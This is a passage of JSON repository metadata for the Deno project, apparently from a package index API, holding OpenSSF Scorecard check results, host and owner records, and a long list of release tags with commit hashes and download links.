using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","depen